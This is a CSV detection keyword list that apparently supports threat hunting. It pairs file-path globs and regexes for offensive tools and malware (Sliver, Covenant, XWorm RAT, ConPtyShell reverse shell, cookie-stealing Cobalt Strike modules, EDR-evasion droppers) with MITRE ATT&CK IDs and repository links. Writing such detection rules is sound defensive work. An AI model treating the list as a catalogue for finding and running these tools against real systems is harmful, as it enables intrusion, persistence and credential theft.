"*/COM-Hunter.exe*",".{0,1000}\/COM\-Hunter\.exe.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*/COM-Hunter.git*",".{0,1000}\/COM\-Hunter\.git.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*/COM-Hunter.sln*",".{0,1000}\/COM\-Hunter\.sln.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*/COMInjectTarget.dll*",".{0,1000}\/COMInjectTarget\.dll.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*/Command Reciever.exe*",".{0,1000}\/Command\sReciever\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/Command%20Reciever.exe*",".{0,1000}\/Command\%20Reciever\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware 
with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/command/exec/sideload.go*",".{0,1000}\/command\/exec\/sideload\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/command/exec/spawndll.go*",".{0,1000}\/command\/exec\/spawndll\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/command_exec.exe*",".{0,1000}\/command_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" 
"*/commandcontrol/malware*.py*",".{0,1000}\/commandcontrol\/malware.{0,1000}\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/commando-vm*",".{0,1000}\/commando\-vm.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*/commix.git",".{0,1000}\/commix\.git","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4340","797","2024-04-29T06:05:52Z","2015-03-20T08:38:26Z" "*/commix.py*",".{0,1000}\/commix\.py.{0,1000}","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4340","797","2024-04-29T06:05:52Z","2015-03-20T08:38:26Z" "*/common/beacon.go*",".{0,1000}\/common\/beacon\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/COM-Object-hijacking.git*",".{0,1000}\/COM\-Object\-hijacking\.git.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","1","N/A","8","1","55","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z" "*/completions/exegol.fish*",".{0,1000}\/completions\/exegol\.fish.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/ComunicationC2.cpp*",".{0,1000}\/ComunicationC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*/CONCRETE_STEEL.exe""*",".{0,1000}\/CONCRETE_STEEL\.exe\"".{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/config/doNmapScanWin.bat 
*",".{0,1000}\/config\/doNmapScanWin\.bat\s.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*/configdhcpserver.sh*",".{0,1000}\/configdhcpserver\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","9","7","N/A","N/A","N/A","N/A" "*/Configure-Victim.ps1*",".{0,1000}\/Configure\-Victim\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/ConfuserEx.exe*",".{0,1000}\/ConfuserEx\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*/ConfuserEx.git*",".{0,1000}\/ConfuserEx\.git.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense 
Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*/ConfuserEx_bin.zip*",".{0,1000}\/ConfuserEx_bin\.zip.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*/ConPtyShell/*",".{0,1000}\/ConPtyShell\/.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*/ContainYourself.git*",".{0,1000}\/ContainYourself\.git.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*/CookieProcessor.cs*",".{0,1000}\/CookieProcessor\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","146","16","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z" "*/Cooolis-ms/*",".{0,1000}\/Cooolis\-ms\/.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. 
Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*/Cordyceps.git*",".{0,1000}\/Cordyceps\.git.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","1","N/A","10","3","N/A","N/A","N/A","N/A" "*/core/browser_darwin.go*",".{0,1000}\/core\/browser_darwin\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","161","24","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "*/core/browser_linux.go*",".{0,1000}\/core\/browser_linux\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","161","24","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "*/core/browser_windows.go*",".{0,1000}\/core\/browser_windows\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","161","24","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "*/couchdb-databases.nse*",".{0,1000}\/couchdb\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/couchdb-stats.nse*",".{0,1000}\/couchdb\-stats\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Covenant*.cs*",".{0,1000}\/Covenant.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/Covenant.git*",".{0,1000}\/Covenant\.git.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/Covenant/*",".{0,1000}\/Covenant\/.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - 
T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/CovenantUsers/*",".{0,1000}\/CovenantUsers\/.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/crack.sh/get-cracking/*",".{0,1000}\/\/crack\.sh\/get\-cracking\/.{0,1000}","offensive_tool_keyword","crack.sh","crack.sh THE WORLD'S FASTEST DES CRACKER. Used by attackers to submit passwords to crack","T1110.002 - T1021.002","TA0006 - TA0008","N/A","N/A","Credential Access","https://crack.sh/get-cracking/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/crack_list/client_wordlists.py*",".{0,1000}\/crack_list\/client_wordlists\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/crack_list/cracklist_api.py*",".{0,1000}\/crack_list\/cracklist_api\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/crack_list/dictionary.py*",".{0,1000}\/crack_list\/dictionary\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - 
T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/crack_list/wordlist.py*",".{0,1000}\/crack_list\/wordlist\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/Cracked5pider/*",".{0,1000}\/Cracked5pider\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" "*/Cracked5pider/*",".{0,1000}\/Cracked5pider\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - 
T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/cracklord.git*",".{0,1000}\/cracklord\.git.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","379","75","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" "*/cracklord/cmd/*",".{0,1000}\/cracklord\/cmd\/.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","379","75","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" "*/CrackMapExec.git",".{0,1000}\/CrackMapExec\.git","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/crackmapexec/cme.conf*",".{0,1000}\/crackmapexec\/cme\.conf.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/cradle.ps1*",".{0,1000}\/cradle\.ps1.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a 
D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","1","N/A","N/A","N/A","N/A" "*/cradle.ps1*",".{0,1000}\/cradle\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/Crassus.git*",".{0,1000}\/Crassus\.git.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","546","57","2024-01-08T09:38:34Z","2023-01-12T21:01:52Z" "*/Crassus-main*",".{0,1000}\/Crassus\-main.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","546","57","2024-01-08T09:38:34Z","2023-01-12T21:01:52Z" "*/crawler.py -u http*",".{0,1000}\/crawler\.py\s\-u\shttp.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","0","N/A","6","10","1835","245","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*/createforestcache.py*",".{0,1000}\/createforestcache\.py.{0,1000}","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. 
compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*/Create-HotKeyLNK.ps1*",".{0,1000}\/Create\-HotKeyLNK\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" 